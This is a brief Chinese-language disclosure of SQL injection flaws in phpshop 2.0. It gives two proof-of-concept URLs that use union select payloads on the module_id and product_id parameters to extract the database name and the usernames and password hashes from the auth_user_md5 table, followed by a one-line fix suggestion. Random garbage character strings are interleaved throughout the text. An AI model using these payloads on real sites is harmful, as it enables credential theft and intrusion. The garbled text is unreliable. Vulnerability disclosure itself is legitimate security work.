标题 : phpshop 2.0 SQL Injection Vulnerability
9 w1 v; y* G& P1 n+ i
6 }: T/ \8 F. Y6 C) `& A" ?作者 : By onestree' M& y6 ^- I8 j% q" ?8 C; e' k2 y
下载地址 : http://code.google.com/p/phpshop/downloads/list! I) o( ]0 B( H: ~" b" ~: e) D
测试地址: windows 7 / ubuntu
7 P/ _+ @6 K- r3 B
2 n& m" ?9 B F# w- s4 R2 U
7 J4 v5 ^' I8 v3 E5 lSQLi p0c:
1 Y' @+ S5 n: R& }) w7 G2 X* y
( i' U& q, c5 M==================
9 N7 t; w* z* F6 r* w- X$ L6 q + V3 Y; z' G' L6 t$ P
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
4 p' Q8 N9 B$ ]8 E2 Y$ junion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
' j8 q. j% [) {& P' ^
4 M. p1 q+ e* p8 J& C+ m4 ?http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
* ]; ]0 D- R$ V0 e# t! Y. Z) H
( h5 |3 r# E5 J' m: [修复:8 \3 n0 k8 D* l' K2 Q* W
加强过滤$ `" i$ q' }7 G( L; q
5 N& ~0 q0 H( g% a" ?- N3 K V, t0 g8 e; E6 u& Q, u, Y: B
|